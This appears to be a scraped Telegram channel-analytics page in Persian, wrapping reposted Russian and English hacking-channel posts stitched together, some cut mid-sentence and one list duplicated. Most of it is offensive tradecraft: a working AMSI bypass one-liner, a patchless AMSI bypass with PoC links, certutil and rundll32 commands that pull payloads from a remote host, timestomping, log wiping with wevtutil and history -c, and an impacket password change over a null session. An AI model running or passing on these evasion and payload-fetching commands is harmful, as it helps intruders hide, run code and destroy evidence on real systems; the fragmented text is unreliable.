All Security Engineering Courses
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
نمایش بیشتر📈 تحلیل کانال تلگرام All Security Engineering Courses
کانال All Security Engineering Courses (@allsecurityengineeringcourses) در بخش زبانی انگلیسی بازیگری فعال است. در حال حاضر جامعه شامل 18 883 مشترک است و جایگاه 7 022 را در دسته فناوری و برنامهها و رتبه 35 455 را در منطقه روسيا دارد.
📊 شاخصهای مخاطب و پویایی
از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 18 883 مشترک جذب کرده است.
بر اساس آخرین دادهها در تاریخ 04 ژوئیه, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 114 و در ۲۴ ساعت گذشته برابر 12 بوده و همچنان دسترسی گستردهای حفظ شده است.
- وضعیت تأیید: تأیید نشده
- نرخ تعامل (ER): میانگین تعامل مخاطب 10.65% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 3.36% واکنش نسبت به کل مشترکان کسب میکند.
- دسترسی پستها: هر پست به طور میانگین 2 010 بازدید دریافت میکند. در اولین روز معمولاً 634 بازدید جمعآوری میشود.
- واکنشها و تعامل: مخاطبان بهطور فعال حمایت میکنند؛ میانگین واکنش به هر پست 3 است.
- علایق موضوعی: محتوا بر موضوعات کلیدی مانند git, strace, github, linux, docker تمرکز دارد.
📝 توضیح و سیاست محتوایی
نویسنده این فضا را محل بیان دیدگاههای شخصی توصیف میکند:
“This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...”
به لطف بهروزرسانیهای پرتکرار (آخرین داده در تاریخ 05 ژوئیه, 2026)، کانال همواره بهروز و دارای دسترسی بالاست. تحلیلها نشان میدهد مخاطبان بهطور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامهها تبدیل کردهاند.
Приветствую в мире цифровой безопасности!
Сегодня расскажу про техники Defense Evasion - как атакующий скрывает свою активность от средств защиты уже после того как закрепился в системе.
⏺Defense Evasion - это не одна техника, а целый класс. Тут задача не выполнить действие тихо один раз, а сделать так чтобы весь дальнейший процесс не триггерил алерты. Без этого закрепление в системе бесполезно: EDR увидит подозрительный процесс через час и всё оборвёт.
⏺AMSI bypass - Windows Antimalware Scan Interface проверяет PowerShell-код перед выполнением. Атакующий патчит функцию проверки прямо в памяти:
$a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$b = $a.GetField('amsiInitFailed','NonPublic,Static')
$b.SetValue($null,$true)
После этого любой вредоносный скрипт проходит без сканирования - AMSI думает, что инициализация провалилась и просто пропускает всё дальше.
⏺Process injection - вместо запуска нового подозрительного процесса код внедряется в уже доверенный:
$proc = Get-Process -Name "explorer"
# Дальше через WriteProcessMemory и CreateRemoteThread
# внедряем shellcode в легитимный процесс
Для мониторинга - это выглядит, как обычный explorer.exe, а не как новый неизвестный бинарь - большинство базовых правил детекта смотрят именно на имя и происхождение процесса.
⏺Timestomping - меняем метки времени файла, чтобы он не выделялся среди системных:
# Linux
touch -r /bin/ls malicious_file
stat malicious_file
# Windows через PowerShell
(Get-Item file.exe).CreationTime = "01/15/2020 10:00:00"
Форензика часто ищет файлы созданные в момент инцидента - timestomping ломает эту эвристику полностью.
⏺Living off the land - используем только легитимные системные утилиты вместо своих инструментов, тогда сигнатурный детект бессилен:
# Скачивание файла через certutil вместо curl
certutil -urlcache -split -f http://10.0.0.1/payload.exe payload.exe
# Выполнение через rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://10.0.0.1/script.sct")
certutil и rundll32 подписаны Microsoft и есть на каждой Windows-машине - антивирус не может просто заблокировать их целиком.
⏺Log clearing - чистим или отключаем логирование там где были:
wevtutil cl Security
wevtutil cl System
# Linux
> /var/log/auth.log
history -c
⏺Детектируется через поведенческий анализ а не сигнатуры: аномальная работа с памятью легитимных процессов, вызов certutil с параметром urlcache, массовая очистка логов сразу после подозрительной активности, несоответствие timestamp файла и записей в MFT. Sysmon Event ID 1 (создание процесса) и 10 (доступ к памяти процесса) - основа для детекта большинства этих техник.
ZeroDay | Серверная Админа | #defenseevasionПриветствую в мире цифровой безопасности!
Поговорим об инструменте для OSINT-разведки по социальным сетям и веб-сервисам.
⏺Social Analyzer ищет профиль человека по юзернейму на более чем 1000 сайтах сразу. В отличие от простых брутфорсеров вроде Sherlock, инструмент использует систему рейтинга от 0 до 100 для каждого найденного профиля - это сильно снижает количество ложных срабатываний, типичную проблему таких тулов.
⏺Под капотом несколько режимов анализа: fast прогоняет проверку быстро через HTTP-запросы, slow подключает реальный браузер через Selenium для сайтов с JS-защитой, а special содержит точечные детекты под конкретные платформы вроде Facebook или Gmail где можно искать даже по номеру телефона или имени без юзернейма.
⏺Установка через Python:
sudo apt-get install python3 python3-pip git
git clone https://github.com/qeeqbox/social-analyzer
cd social-analyzer
pip3 install -r requirements.txt
⏺Базовый поиск по юзернейму:
python3 app.py --username "johndoe"
⏺Поиск по нескольким юзернеймам сразу для корреляции - если разные аккаунты используют похожие имена:
python3 app.py --username "johndoe,janedoe" --metadata
⏺Фильтрация по типу сайтов и стране - не нужно прогонять все 1000 ресурсов когда интересны конкретные категории:
python3 app.py --username "johndoe" --type "adult"
python3 app.py --username "johndoe" --countries "ru us" --top 100
⏺Получаем скриншоты найденных профилей и метаданные сразу - нужен установленный Chrome:
python3 app.py --username "johndoe" --metadata --extract
⏺Фильтруем результаты по уверенности детекта чтобы не разбирать сотни ложных совпадений:
python3 app.py --username "johndoe" --filter "good"
python3 app.py --username "johndoe" --filter "good,maybe"
⏺Запуск как веб-приложение для более удобной работы через браузер:
npm install
npm start
# доступно на http://0.0.0.0:9005/app.html
ZeroDay | Белый Хакер | #Инструментimport shodan
api = shodan.Shodan('API_KEY')
results = api.search('apache')
2. python-nmap — автоматизируйте сканирование портов
import nmap
nm = nmap.PortScanner()
nm.scan('192.168.1.0/24', '22-443')
3. requests — отправляйте HTTP-запросы и парсите ответы
import requests
r = requests.get('https://api.github.com')
4. beautifulsoup4 — парсинг HTML-страниц для сбора данных
from bs4 import BeautifulSoup
soup = BeautifulSoup(html, 'html.parser')
5. paramiko — работа с SSH (удалённое выполнение команд, передача файлов)
import paramiko
ssh = paramiko.SSHClient()
ssh.connect('host', username='user', password='pass')
🎁 Установка одной командой:
pip install shodan python-nmap requests beautifulsoup4 paramiko
😈 CodeGuard: PySec Edition | Чатnxc smb $IP -u '' -p '') и выполнить:
impacket-changepasswd -protocol smb-samr -newpass 'NewPass' 'domain\user:OldPass@<IP_с_null_sess> -dc-ip <IP_DC>
При этом нужно использовать протокол smb-samr.
Пример:
impacket-changepasswd -protocol smb-samr -newpass 'NewP@ssw0rd321!' 'duty-free.cc/user1:P@ssw0rd12@192.168.78.2 -dc-ip 192.168.78.1
Почему это работает? Протокол SAMR (RPC-сервис управления учётками) позволяет сменить пароль без предварительной аутентификации — достаточно передать старый+новый пароль в RPC-вызов через анонимное подключение.A simple and efficient tool to automatically change your IP address using Tor network at regular intervals.🌀 Automatic IP rotation at user-defined intervals ⚡️ Uses Tor network for secure IP changes 🚀 Works on multiple Linux distributions ⚡️ Easy installation and setup 💘 Run without installation
Supported Distributions Arch Linux / Manjaro Debian / Ubuntu Kali Linux Parrot OS Fedora OpenSUSELink:- https://github.com/techchipnet/ip-changer Posted by @BugSec😈⭐️✅ Make Me Admin In Your Channel For Posting awesome content Learn Hacking From Basics to Elite Level💎
sudo apt install lynis
Запуск аудита:
sudo lynis audit system
Что проверяет:
⚫️Пароли и учётные записи ⚫️Права на файлы (/etc, /var, /tmp) ⚫️Сетевые настройки (SSH, firewall, открытые порты) ⚫️Логирование и доступ к логам ⚫️Наличие бэкдоров и rootkitПример вывода:
[+] SSH — рекомендовано использовать ключи вместо паролей [!] /tmp не смонтирован с nodevФикс проблем:
sudo lynis audit system --quick
sudo lynis audit system --fix
🔥 Бонус: Lynis даёт готовый совет по каждой найденной проблеме.
😈 CodeGuard: PySec Edition | ЧатNtProtectVirtualMemory на страницу памяти, содержащую AmsiScanBuffer, ставится PAGE_GUARD. При доступе к этой странице возникает STATUS_GUARD_PAGE_VIOLATION, который перехватывается через VEH.
Если исключение пришло именно на AmsiScanBuffer, хэндлер подменяет результат на AMSI_RESULT_CLEAN и делает early return, эмулируя завершение функции без патча её байтов.
Так как guard-page — одноразовая ловушка, после первого срабатывания защита снимается. Поэтому в обработчике дополнительно используется Trap Flag: затем ловится STATUS_SINGLE_STEP, и PAGE_GUARD навешивается повторно.
Итог: байты функции остаются нетронутыми, а Dr0–Dr3 в этом варианте не используются, поэтому исчезают артефакты, характерные для inline patching и классических HWBP-обходов. Но это не означает «недетектируемость» вообще — современные поведенческие детекты всё ещё возможны.
В улучшенном варианте (VEH²) hardware breakpoint выставляется прямо через CONTEXT.Dr* внутри самого VEH, без вызова SetThreadContext / NtSetContextThread. Это убирает один из заметных telemetry-path, на который отдельно обращают внимание исследователи.
📖 Research
🔗 shigshag.com/blog/amsi_page_guard
🔗 crowdstrike.com/blog/crowdstrike-investigates-threat-of-patchless-amsi-bypass-attacks/
💻 PoC
🔗 github.com/vxCrypt0r/AMSI_VEH
🔗 fluxsec.red/veh-squared-rust
#amsi #evasion #redteam #windows #maldevfind /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;
• Поиск API-ключей и секретов
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
• Обнаружение опасных вызовов функций
cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"
• Проверка манипуляций с URL
cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"
• Поиск междоменных запросов
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
• Анализ использования postMessage
cat * | grep -r "postMessage"
• Поиск захардкоженных URL или эндпоинтов
cat * | grep -rE "https?://|www\."
• Поиск отладочной информации
cat * | grep -rE "console\.log|debugger|alert|console\.dir"
• Исследование обработки пользовательского ввода
cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;
• Поиск API-ключей и секретов
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
• Обнаружение опасных вызовов функций
cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"
• Проверка манипуляций с URL
cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"
• Поиск междоменных запросов
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
• Анализ использования postMessage
cat * | grep -r "postMessage"
• Поиск захардкоженных URL или эндпоинтов
cat * | grep -rE "https?://|www\."
• Поиск отладочной информации
cat * | grep -rE "console\.log|debugger|alert|console\.dir"
• Исследование обработки пользовательского ввода
cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
